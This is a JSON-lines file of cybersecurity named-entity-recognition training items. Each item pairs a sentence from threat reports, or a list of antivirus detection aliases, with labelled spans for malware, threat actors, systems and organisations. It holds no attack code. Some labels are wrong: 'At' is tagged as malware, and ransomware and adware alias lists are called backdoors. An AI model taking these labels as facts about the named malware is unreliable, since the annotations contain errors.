{"text": "The main goal of the xDedic forum is to facilitate the buying and selling of credentials for hacked servers which are available through RDP.", "spans": {"THREAT_ACTOR: xDedic forum": [[21, 33]], "SYSTEM: hacked servers": [[93, 107]], "SYSTEM: RDP.": [[136, 140]]}, "info": {"id": "cyner2_train_001429", "source": "cyner2_train"}}
{"text": "This report is the first to detail the attack against strategic US interests to China.", "spans": {}, "info": {"id": "cyner2_train_001430", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Archbomb.ZIP Trojan-ArcBomb.ZIP.Bubl.b Trojan.Zip.Arch-Bomb.yngkq BehavesLike.Win32.Trojan.dh Trojan.Archbomb BOMB/ArcBomb.O Trojan-ArcBomb.ZIP.Bubl.b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001431", "source": "cyner2_train"}}
{"text": "The abuse of shortcut LNK files is steadily gaining traction among cybercriminals.", "spans": {"THREAT_ACTOR: cybercriminals.": [[67, 82]]}, "info": {"id": "cyner2_train_001433", "source": "cyner2_train"}}
{"text": "Initially, we've called it Matrix Banker based on its command and control C2 login panel, but it seems that Matrix Admin is a template available for the Bootstrap web framework.", "spans": {"MALWARE: Matrix Banker": [[27, 40]], "SYSTEM: the Bootstrap web framework.": [[149, 177]]}, "info": {"id": "cyner2_train_001434", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/Shuq.B W32/Shuq.g I-Worm.Shuq!TBLjXfxv+A8 W32.SillyFDC Win32/Shuq.NAA TROJ_ANGEL.F Worm.Shuq.B Email-Worm.Win32.Shuq.g Trojan.Win32.Shuq.epjd Trojan.Win32.S.HDC.66048[h] W32.W.Shuq.g!c Backdoor.Win32.Shuq.NAA BackDoor.HSV.1013 Worm.Shuq.Win32.5 TROJ_ANGEL.F W32/Risk.OPXF-7688 Worm/Sramota.aws W32/ANGEL.G@mm Worm[Email]/Win32.Shuq Trojan/Win32.HDC Backdoor:Win32/Shuq.A Worm.Shuq Win32.Worm-email.Shuq.Eerm Email-Worm.Win32.Shuq I-Worm/Shuqing.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001436", "source": "cyner2_train"}}
{"text": "Reasons for Taiwan being targeted range from being one of the sovereign states of the disputed South China Sea region to its emerging economy and growth with Taiwan being one of the most innovative countries in the High-Tech industry in Asia.", "spans": {"ORGANIZATION: High-Tech industry": [[215, 233]]}, "info": {"id": "cyner2_train_001438", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.DipNet.139264 W32/DipNet.f Trojan.Win32.DipNet.emkm W32/Dipnet.F Trojan.Netdepix.B Win32/Dipnet.NAD Net-Worm.Win32.DipNet.f Worm.DipNet!vTuZ7jF3dLw Worm.Win32.DipNet.139264[h] W32.W.DipNet.f!c Virus.Win32.Part.a Worm.Win32.Dipnet.NAD BackDoor.Xdoor.351 Worm.DipNet.Win32.8 BehavesLike.Win32.Trojan.ch W32/Dipnet.XULH-0302 Worm/DipNet.a WORM/DipNet.b W32/Netdepix.B!worm Worm[Net]/Win32.DipNet Win32/Dipnet.worm.139264 Worm:Win32/DipNet.H Win32/Oddbob.E Net-Worm.DipNet W32/Oddbob.E.worm Backdoor.Win32.Xdoor Worm/Dipnet.M Worm.Win32.DipNet.aMVE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001439", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.DL.VB.IHEW Trojan-Spy.Win32.Bancos.alh!IK Trojan-Downloader.Win32.VB.tbx TR/Spy.65536.194 TSPY_ZBOT.SMDM Trojan.Spy.65536.194 TrojanDownloader.VB.vhu TrojanSpy:Win32/Bancos.KY Trojan-Downloader.Win32.VB.tbx Trojan-Spy.Win32.Bancos.alh", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001441", "source": "cyner2_train"}}
{"text": "On July 5, 2015 an unknown hacker publicly announced on Twitter that he had breached the internal network of Hacking Team – an Italian pentesting company known to purchase 0-day exploits and produce their own trojans.", "spans": {"THREAT_ACTOR: unknown hacker": [[19, 33]], "ORGANIZATION: Twitter": [[56, 63]], "ORGANIZATION: Hacking Team": [[109, 121]], "ORGANIZATION: pentesting company": [[135, 153]], "MALWARE: 0-day exploits": [[172, 186]], "MALWARE: trojans.": [[209, 217]]}, "info": {"id": "cyner2_train_001442", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Harnig!O Win32.Trojan-Downloader.Harnig.cu Trojan.Gobrena TROJ_HARNIG.FC Trojan-Downloader.Win32.Harnig.cu Trojan.Win32.Harnig.dpsezu PE:Trojan.DL.Tibs.fxl!1074175505 Trojan.DownLoader.13549 Downloader.Harnig.Win32.2 TROJ_HARNIG.FC TrojanDownloader.Harnig.alh TR/Dldr.Small.dib.6 Trojan[Downloader]/Win32.Harnig.cu Win32.TrojDownloader.Harnig.co.kcloud Trojan/Win32.Harnig Trojan-Downloader.Revelation.Tibs.B Trojan-Downloader.Win32.Harnig.cr W32/Harnig.CU!tr.dldr Downloader.Harnig.AP Trojan.Win32.Harnig.Aj", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001443", "source": "cyner2_train"}}
{"text": "Every one of these campaigns involved a Windows version of Derusbi.", "spans": {"THREAT_ACTOR: campaigns": [[19, 28]], "SYSTEM: Windows version": [[40, 55]], "MALWARE: Derusbi.": [[59, 67]]}, "info": {"id": "cyner2_train_001445", "source": "cyner2_train"}}
{"text": "On October 10, 2017, Kaspersky Lab's advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers.", "spans": {"ORGANIZATION: Kaspersky Lab's": [[21, 36]], "SYSTEM: advanced exploit prevention systems": [[37, 72]], "VULNERABILITY: Adobe Flash zero day": [[90, 110]], "MALWARE: exploit": [[111, 118]], "ORGANIZATION: customers.": [[148, 158]]}, "info": {"id": "cyner2_train_001446", "source": "cyner2_train"}}
{"text": "The service offers a binder tool that allows users to masquerade their malware as legitimate software.", "spans": {"MALWARE: binder tool": [[21, 32]], "MALWARE: malware": [[71, 78]]}, "info": {"id": "cyner2_train_001447", "source": "cyner2_train"}}
{"text": "Malwarebytes has been observing a surge in drive-by download attacks since the recent Flash zero-day now patched.", "spans": {"ORGANIZATION: Malwarebytes": [[0, 12]], "VULNERABILITY: Flash zero-day": [[86, 100]]}, "info": {"id": "cyner2_train_001449", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanAPT.BrowsPass.ST3 Trojan.MSIL.Ubibila.1 Win32.Trojan.WisdomEyes.16070401.9500.9999 MSIL.Trojan.Pinject.A Trojan-Dropper.Win32.Sysn.bgns Trojan.Win32.MailPassView.dzxrgp Tool.MailPassView.236 BehavesLike.Win32.Trojan.gc Trojan.PSW.Fareit.te TR/Dropper.MSIL.sbcsg Trojan:MSIL/Golbla.B Trojan-Dropper.Win32.Sysn.bgns Trojan/Win32.Golbla.C1246680 Trj/CI.A Win32.Trojan-dropper.Sysn.Akyi Trojan.Inject MSIL/Injector.MRD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001451", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.AutorunXjyv.Worm Trojan.Dropper.VIO Trojan/W32.Chydo.569344.E Trojan.KillAv.DR Trojan.Chydo Win32.Worm.Autorun.j Win32/Pykspa.C WORM_MESSEN.SMF Trojan.Dropper.VIO Worm.Win32.AutoRun.iea Trojan.Dropper.VIO Trojan.Win32.Chydo.eahreo Trojan.Win32.Chydo.516096.B Trojan.Dropper.VIO Trojan.MulDrop5.14836 Worm.AutoRun.Win32.116380 WORM_MESSEN.SMF BehavesLike.Win32.Backdoor.hc Trojan/Chydo.bj Trojan.Dropper.VIO Worm.Win32.AutoRun.iea TrojanDropper:Win32/Pykspa.A Trojan/Win32.Chydo.R40147 Trojan.Dropper.VIO Trojan.Chydo Trojan.Win32.FakeAlert.ate Trojan.Win32.KillAV.Y", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001452", "source": "cyner2_train"}}
{"text": "In this post, we will be pulling apart and dissecting the Rambo backdoor and discussing several of its evasion techniques.", "spans": {"MALWARE: the Rambo backdoor": [[54, 72]]}, "info": {"id": "cyner2_train_001453", "source": "cyner2_train"}}
{"text": "DarkKomet variant, often dropped as patcher.exe", "spans": {"MALWARE: DarkKomet variant,": [[0, 18]]}, "info": {"id": "cyner2_train_001454", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clodee5.Trojan.2bfc Trojan.Proxy.Wopla.Q Trojan-Proxy/W32.Wopla.20992.D Trojan.Wopla.Win32.59 Trojan/Proxy.Wopla.q Trojan.PR.Wopla!heGrkrdKLNg Trojan.Tannick.B Win32/Pokier.V TSPY_WOPLA.Q Trojan.Proxy.Wopla.Q Trojan-Proxy.Win32.Wopla.q Trojan.Proxy.Wopla.Q Trojan.Win32.Wopla.csuaej PE:Trojan.Proxy.Wopla.ay!100004534 Trojan.Proxy.Wopla.Q TrojWare.Win32.TrojanDownloader.Small.AA Trojan.Proxy.Wopla.Q TSPY_WOPLA.Q BehavesLike.Win32.Downloader.mc W32/Trojan.AXS TrojanProxy.Wopla.d TR/Proxy.Wopla.Q.4 Win32.Troj.Wopla.q.kcloud Trojan.Proxy.Wopla.Q Win-Trojan/Wopla.20992 TrojanProxy.Wopla Trj/Alpiok.A Trojan-Proxy.Win32.Wopla.Q Multidr.J!tr Proxy.BKA.dropper Trojan.Win32.Wopla.AdJ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001455", "source": "cyner2_train"}}
{"text": "We rapidly determined that this spam campaign was attempting to broadly deliver TeslaCrypt 4.1A to individuals.", "spans": {"THREAT_ACTOR: spam campaign": [[32, 45]], "MALWARE: TeslaCrypt 4.1A": [[80, 95]], "ORGANIZATION: individuals.": [[99, 111]]}, "info": {"id": "cyner2_train_001456", "source": "cyner2_train"}}
{"text": "FireEye Threat Intelligence analysts identified a spear phishing campaign carried out in August 2015 targeting Hong Kong-based media organizations.", "spans": {"ORGANIZATION: FireEye Threat Intelligence": [[0, 27]], "THREAT_ACTOR: spear phishing campaign": [[50, 73]], "ORGANIZATION: media organizations.": [[127, 147]]}, "info": {"id": "cyner2_train_001459", "source": "cyner2_train"}}
{"text": "A backdoor also known as: DoS.Small W32/VirTool.OH Bloodhound.W32.EP DoS.Win32.Small.e Trojan.Win32.Small.dosb Flooder.Upsend W32/Tool.GNXW-3960 DoS.Small.c HackTool[DoS]/Win32.Small DoS:Win32/Small.E DoS.Win32.Small.e DoS.Small Win32.Trojan.Small.Lnoh DoS.Win32.Small W32/Small.E!dos", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001460", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.UsernameReimuatH.Trojan Worm/W32.WBNA.294912.AU Trojan.Win32.Diple!O Trojan.Beebone.D Trojan/VBObfus.fz Win32.Worm.Pronny.d Win32/VB.KXfdHDB WORM_VOBFUS.SM37 Win.Packer.VBCrypt-5731517-0 Worm.Win32.Vobfus.erof Trojan.Win32.Vobfus.enwdjc Win32.Worm.Vobfus.Wvay Win32.HLLW.Autoruner2.18084 WORM_VOBFUS.SM37 BehavesLike.Win32.Autorun.dh Win32.Virut.ce.57344 Trojan.Symmi.D13A73 Trojan.Win32.A.Diple.299008.BAT Worm.Win32.Vobfus.erof Worm/Win32.WBNA.R108353 TScope.Trojan.VB Worm.Win32.Vobfus", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001462", "source": "cyner2_train"}}
{"text": "Once OSX/Dok infection is complete, the attackers gain complete access to all victim communication, including communication encrypted by SSL.", "spans": {"MALWARE: OSX/Dok": [[5, 12]], "THREAT_ACTOR: attackers": [[40, 49]]}, "info": {"id": "cyner2_train_001465", "source": "cyner2_train"}}
{"text": "Once in the live session, if there is a file in /var/lib/man.cy, then this is an infected ISO.", "spans": {"MALWARE: infected ISO.": [[81, 94]]}, "info": {"id": "cyner2_train_001467", "source": "cyner2_train"}}
{"text": "At a high level, Romberik is a complex piece of malware that is designed to hook into the user's browser to read credentials and other sensitive information for exfiltration to an attacker controlled server, similar to Dyre.", "spans": {"MALWARE: At": [[0, 2]], "MALWARE: Romberik": [[17, 25]], "MALWARE: malware": [[48, 55]], "MALWARE: Dyre.": [[219, 224]]}, "info": {"id": "cyner2_train_001468", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.Avisa.69632 Trojan-PSW.Win32!O W32/Inttest.worm PWS-Inttest.B TROJ_AVISA.B Win32.Trojan.WisdomEyes.16070401.9500.9757 W32/Risk.CNKX-3667 Infostealer.Avisa Win32/PSW.Cript.B Trojan-PSW.Win32.Deintel Trojan.Win32.Avisa-Psw.fdrj Trojan.Win32.Avisa.69632 Trojan.Avisa.Win32.2 BehavesLike.Win32.PJTbinder.km Worm.Pws.Inttest Trojan/PSW.Avisa Trojan[PSW]/Win32.Deintel Trojan-PSW.Win32.Deintel Trojan/Win32.HDC.C89238 TrojanPSW.Deintel Trj/PSW.Intetest Win32/PSW.Avisa.A Win32.Trojan-qqpass.Qqrob.Sxoe Trojan.PSW.Avisa W32/Avisa.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001469", "source": "cyner2_train"}}
{"text": "Related insfrastructure shows another suspicious looking domain that mimics the Court of Arbitration for Sport", "spans": {"SYSTEM: insfrastructure": [[8, 23]], "ORGANIZATION: the Court of Arbitration for Sport": [[76, 110]]}, "info": {"id": "cyner2_train_001472", "source": "cyner2_train"}}
{"text": "Their primary interest appears to be gathering intelligence related to foreign and security policy in the Eastern Europe and South Caucasus regions.", "spans": {"ORGANIZATION: foreign": [[71, 78]], "ORGANIZATION: security policy": [[83, 98]]}, "info": {"id": "cyner2_train_001473", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Backdoor.Bifrose Trojan.Win32.Small.cup Trojan.Win32.Buzus.rbpz Trojan.Win32.Buzus.86895 Trojan.MulDrop.18143 BehavesLike.Win32.Backdoor.hc Trojan/Buzus.fcx Virus.Trojan.Win32.Buzus.acj W32/Trojan2.AGMZ Trojan/Buzus.cf TrojanDropper:Win32/Buzus.B W32.W.Ridnu.ls5O Trojan.Win32.Small.cup Trojan/Win32.Buzus.C71809 Trojan.Buzus W32/Kryptix.KZB!tr Win32/Trojan.6a2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001474", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.771B Ransom.Cerber.A4 Ransom.Cerber Trojan.Symmi.D13E52 Ransom_HPCERBER.SM3 Win32.Trojan.Kryptik.avs Ransom_HPCERBER.SM3 Trojan-Ransom.Win32.Rack.hly Trojan.Win32.Rack.evkhfe Trojan.Encoder.761 BehavesLike.Win32.Ransomware.gh Ransom.Win32.Teerac Trojan.Rack.dk Trojan-Ransom.Win32.Rack.hly Trojan.Menti Trj/GdSda.A W32/Kryptik.FSUS!tr Win32/Trojan.Ransom.7c1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001475", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Yafive.A.mue Win32.Trojan.WisdomEyes.16070401.9500.9991 Trojan-Downloader.Win32.QQHelper.air Troj.Spy.W32.Zbot.kYVW TrojWare.Win32.TrojanDownloader.Tiny.~CA BackDoor.Update.293 Win32.Hack.XComp.a.410674 TrojanDownloader:Win32/Yafive.A Trojan-Downloader.Win32.QQHelper.air TrojanDownloader.QQHelper Trojan-Downloader.Win32.QQHelper", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001479", "source": "cyner2_train"}}
{"text": "It recently resurfaced in November 2016 W32.Disttrack.B, again attacking targets in Saudi Arabia.", "spans": {"ORGANIZATION: Saudi Arabia.": [[84, 97]]}, "info": {"id": "cyner2_train_001481", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Yodo.A@mm Worm/W32.Yodo.1273856 W32/Yodo.a Win32.Yodo.E90817 WORM_YODO.F W32.Yodo@mm Win32/Yodo.D WORM_YODO.F Win32.Yodo.A@mm Email-Worm.Win32.Yodo.a Win32.Yodo.A@mm Trojan.Win32.Yodo.bdnumu W32.W.Yodo.a!c Win32.Yodo.A@mm Worm.Win32.Yodo.B.Dropper Win32.Yodo.A@mm Trojan.MulDrop.572 Worm.Yodo.Win32.1 BehavesLike.Win32.VBObfus.tm W32/Risk.OQBD-6759 Worm/Yodo.b Worm:Win32/Yodo.B.dr WORM/Yodo.A.1 Worm[Email]/Win32.Yodo Worm.Yodo.a.kcloud Worm:Win32/Yodo.B.dr Email-Worm.Win32.Yodo.a Worm.Yodo Win32/Yodo.B.Dropper Win32.Worm-email.Yodo.Eddu I-Worm.Yodo!uEen0717POE W32/Yodo.A!worm Win32/Worm.bde", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001482", "source": "cyner2_train"}}
{"text": "We don't have the statistics of devices vulnerable to both issues at the same time.", "spans": {"VULNERABILITY: devices vulnerable": [[32, 50]]}, "info": {"id": "cyner2_train_001483", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Krypt.8 TROJ_TDSS.SMA Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_TDSS.SMA Packed.Win32.TDSS.aa Trojan.Win32.Tdss.btyvr Win32.PkdTdss Trojan.Packed.2936 BehavesLike.Win32.Adware.kc TrojanDropper:Win32/Sudiet.A Packer.W32.Tdss!c Packed.Win32.TDSS.aa Trojan/Win32.ADH.R21764 Trojan.TDSS.01414 Win32.Packed.Tdss.Akox Packer.Win32.Tdss W32/PackTDss.K!tr Win32/Trojan.5b8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001484", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.Bundpil.d Win32.Worm.Resparc.B Trojan:Win32/Lodbak.A Trojan/Win32.Lodbak.R151670 Trj/Gamarue.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001487", "source": "cyner2_train"}}
{"text": "Intrusions began as early as 1996.", "spans": {}, "info": {"id": "cyner2_train_001488", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Scrop.exbmlp BehavesLike.Win32.AdwareConvertAd.fh W32/Trojan.YEZU-6096 TrojanDropper.Scrop.ns Trojan[Dropper]/Win32.Scrop Backdoor:Win32/Blopod.A!bit Trojan.Symmi.D13661 Dropper/Win32.Scrop.C2319178 TrojanDropper.Scrop Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001489", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Netstop.A Backdoor.Padmin Backdoor.W32.Padmin.08!c Trojan/wGet.d Backdoor.Padmin.0.8 W32/Risk.LANR-3940 Win.Trojan.Padmin-2 Backdoor.Padmin.0.8 Trojan.Netstop.A Trojan.Win32.Padmin.dyyica Backdoor.Win32.Padmin.08 Trojan.Netstop.A BackDoor-ATM.dr Backdoor/Padmin.08.Install DR/Padmin.08 BackDoor-ATM.dr Backdoor.Padmin Bck/Iroffer.BG Win32/Padmin.08.A.dropper W32/Padmin.A!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001491", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Adware.Heur.cmSfNKMeS5mk WORM_AMBLER.SMI Win32.Trojan.WisdomEyes.16070401.9500.9938 WORM_AMBLER.SMI Trojan.Win32.BHO.bmciwr Trojan.PWS.Finanz.origin W32/Ambler.dll TrojanDownloader:Win32/BHO.A TrojanDownloader.BHO Trj/CI.A Win32.Trojan.Spy.Hrza TrojanSpy.Banker!l0YgZsorMww Trojan-Spy.Finanz.J W32/Ambler.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001492", "source": "cyner2_train"}}
{"text": "This new report is an updated dissection of the group's attacks and methodologies—something to help organizations gain a more comprehensive and current view of these processes and what can be done to defend against them.", "spans": {"THREAT_ACTOR: group's": [[48, 55]], "ORGANIZATION: organizations": [[100, 113]]}, "info": {"id": "cyner2_train_001494", "source": "cyner2_train"}}
{"text": "The email messages used in the attacks leverage themes related to economic development and politics in Burma, which is relevant to the work of the NGO.", "spans": {"ORGANIZATION: NGO.": [[147, 151]]}, "info": {"id": "cyner2_train_001495", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan:Win32/Vareids.A Trojan.FakeAV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001496", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.VBKrypt!O Worm.Rebhip.B3 Troj.W32.Scar!c Trojan/Injector.eyu Trojan.Win32.Scar.odxb Trojan.Win32.VBKrypt.ecjqdh Trojan.Win32.A.VBKrypt.200710 TrojWare.Win32.VBKrypt.cjb Trojan.Inject.27856 Trojan.VBKrypt.Win32.39868 BehavesLike.Win32.PWSSpyeye.cc W32/Trojan.FNVH-2986 Trojan/VBKrypt.bgwm Trojan/Win32.VBKrypt Trojan.ManBat.1 Trojan.Win32.Scar.odxb Trojan/Win32.VBKrypt.C66955 PWS-Spyeye.el SScope.Malware-Cryptor.VBCR.1841 Win32.Trojan.Scar.Tccd Trojan.VBKrypt!joEshOiwspo Win32/Trojan.00c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001497", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/VB.qtt Backdoor.Win32.Sdbot.aeua Trojan.Win32.Nifclop.bbwtga Trojan.DownLoader6.34031 TR/Nifclop.A.6 Trojan:Win32/Nifclop.A Backdoor.Win32.Sdbot.aeua Win32/VB.QTT Trojan.Win32.Nifclop Win32/Trojan.fdb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001498", "source": "cyner2_train"}}
{"text": "During the last few days, we have observed a campaign redirecting visitors from large websites to the Angler EK.", "spans": {"THREAT_ACTOR: campaign": [[45, 53]], "MALWARE: Angler EK.": [[102, 112]]}, "info": {"id": "cyner2_train_001499", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Gamarue.2!O TrojanDropper.Dexel.A5 Trojan.Blocker.Win32.18819 WORM_DEXEL.SM Win32.Trojan.WisdomEyes.16070401.9500.9869 W32/Autorun.LWDQ-2252 W32.SillyFDC Win32/Dapato.AY WORM_DEXEL.SM Trojan.Win32.Blocker.dbnfux Troj.Dropper.W32.FrauDrop.tnsr BehavesLike.Win32.Trojan.fh W32/Autorun.ABG TrojanDropper.Dapato.pgs Trojan[Dropper]/Win32.Dapato TrojanDropper:Win32/Dexel.A Trojan.Zusy.D26D16 Win32.Trojan.Dapato.B HEUR/Fakon.mwf TrojanDropper.FrauDrop Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001501", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SvchostVS.Trojan Worm.Moarider Trojan/Autoit.nlq Win32.Trojan.AutoIt.a Bloodhound.Malautoit WORM_SOHANAD_EH110001.UVPC Trojan.Win32.Autoit.aza Trojan.Script.AutoIt.dbycya Troj.W32.Autoit.lWNh TrojWare.Win32.Autoit.AZA Trojan.DownLoader19.27399 WORM_SOHANAD_EH110001.UVPC BehavesLike.Win32.Comame.fc Trojan.Win32.Autoit TR/BAS.Samca.1188111 Trojan:Win32/Svhoder.A Trojan.Heur.E6CE86 Trojan.Win32.Autoit.aza HEUR/Fakon.mwf Trojan.Autoit.Wirus Trojan.Autoit.NLQ Win32/Autoit.NLQ W32/Autoit.NLQ!tr W32/Sality.AH", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001503", "source": "cyner2_train"}}
{"text": "This infection is based on previously reported Gozi ISFB/Ursnif activity from March 6, 2023.", "spans": {"MALWARE: infection": [[5, 14]], "THREAT_ACTOR: Gozi ISFB/Ursnif": [[47, 63]]}, "info": {"id": "cyner2_train_001506", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PUP.Optional.BrSoftware Trojan.ADH Trojan-Banker.Win32.Lohmys.a Application.Win32.Midia.BR MalSign.Skodna.BRS Adware.Win32.Midia.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001507", "source": "cyner2_train"}}
{"text": "It is designed to steal money from unsuspecting victims right off their bank accounts without them even noticing.", "spans": {}, "info": {"id": "cyner2_train_001509", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9866 W32/Trojan.IKAJ-5854 Infostealer.Banker.C Win32/Kollah.MWH Trojan.JarDrop.1 W32.Trojan.Dropper TR/Spy.ZBot.aww TrojanDropper:Win32/Jazuz.A Win32/Trojan.Spy.d85", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001510", "source": "cyner2_train"}}
{"text": "Indicators about some panels hosting the DDoS Blue Botnet", "spans": {"MALWARE: DDoS Blue Botnet": [[41, 57]]}, "info": {"id": "cyner2_train_001511", "source": "cyner2_train"}}
{"text": "The utility can be installed on smartphones and tablets as a program named Insta Plus, Profile Checker, and Cleaner Pro.", "spans": {"SYSTEM: smartphones": [[32, 43]], "SYSTEM: tablets": [[48, 55]]}, "info": {"id": "cyner2_train_001513", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Minnerchek Trojan.Win32.S.Downloader.31046816 Trojan.Win32.Minnerchek Adware.Installcore Trojan:Win32/Minnerchek.A Dropper/Win32.CoinMiner.C2322242 Trj/Downloader.MEP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001514", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAdware.689E PUP.Firseria/Variant Trojan.Application.Bundler.Morstar.30 Trojan.Dropper Win32/Tnega.ZRdFDZD Win.Adware.Morstar-136 not-a-virus:Downloader.Win32.Morstar.dhp Trojan.Win32.Morstar.dmuxrd Adware.Win32.Firseria.b Trojan.DownLoader11.57090 AdWare/Solimba.h RiskWare[Downloader]/Win32.Morstar TrojanDropper:Win32/Sventore.C not-a-virus:Downloader.Win32.Morstar.dhp Win32.Application.Morstar.E PUP/Win32.Solimba.R133806 PUP.Optional.Firseria PUA.Downloader! AdWare.BundleApp Win32/Application.164", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001517", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kazy.D4E7E3 Win32.Trojan.WisdomEyes.16070401.9500.9858 Trojan.Win32.CFI.eurnzt Trojan.Win32.Z.Kazy.253952.EN TrojWare.Win32.FraudPack.P Trojan.Click2.54806 W32/Trojan.JQCG-7679 PWS:Win32/Reteged.B TrojanSpy.Dibik Trojan-Spy.Reteged Adware/Win32.180solutions.BM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001518", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Mlw.ewmnqj W32/Trojan.MKOX-6072 TR/Dropper.MSIL.citga Trj/CI.A Win32/Trojan.5e4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001519", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Cyn.18944.B Backdoor.Cyn Email-Worm.Win32.GOPworm.196 BKDR_CYN.C Backdoor.Trojan BKDR_CYN.C Backdoor.Win32.Cyn.12.a Trojan.Win32.Cyn.dotopq Backdoor.Win32.Cyn_12.EditSvr BackDoor.Cyn.12 Trojan.Cyn.Win32.1 BehavesLike.Win32.Trojan.lh W32/Risk.EBIW-7264 Backdoor/Cyn.f BDC/Cyn.12.A.EdS Backdoor:Win32/Cyn.1_02 Backdoor.Win32.Cyn.12.a Win-Trojan/Cyn_v12.18944 Email-Worm.Win32.GOPworm.196 SScope.Trojan.VBRA.3344 Bck/Cyn.12 Win32/Cyn.12 Backdoor.Cyn!pLjU0MDAXWM W32/Cyn.12!tr.bdr Win32/Backdoor.ac7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001520", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Exxroute.A3 Ransom.Cerber Win32.Trojan.Kryptik.bjk Ransom_CERBER.SM37 Win.Ransomware.Cerber-6162277-0 Trojan.Win32.Zerber.eltxmx Troj.Ransom.W32.Zerber.toho Trojan.DownLoader23.53130 Trojan.Kryptik.Win32.1113485 Ransom_CERBER.SM37 BehavesLike.Win32.Ransom.kh Trojan.Zerber.atr Backdoor:Win32/Crugup.B W32/Kryptik.FOLJ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001522", "source": "cyner2_train"}}
{"text": "Typically, these campaigns leverage spear phishing as the delivery vector and often include malicious attachments designed to bypass typical detection controls.", "spans": {"THREAT_ACTOR: campaigns": [[17, 26]]}, "info": {"id": "cyner2_train_001523", "source": "cyner2_train"}}
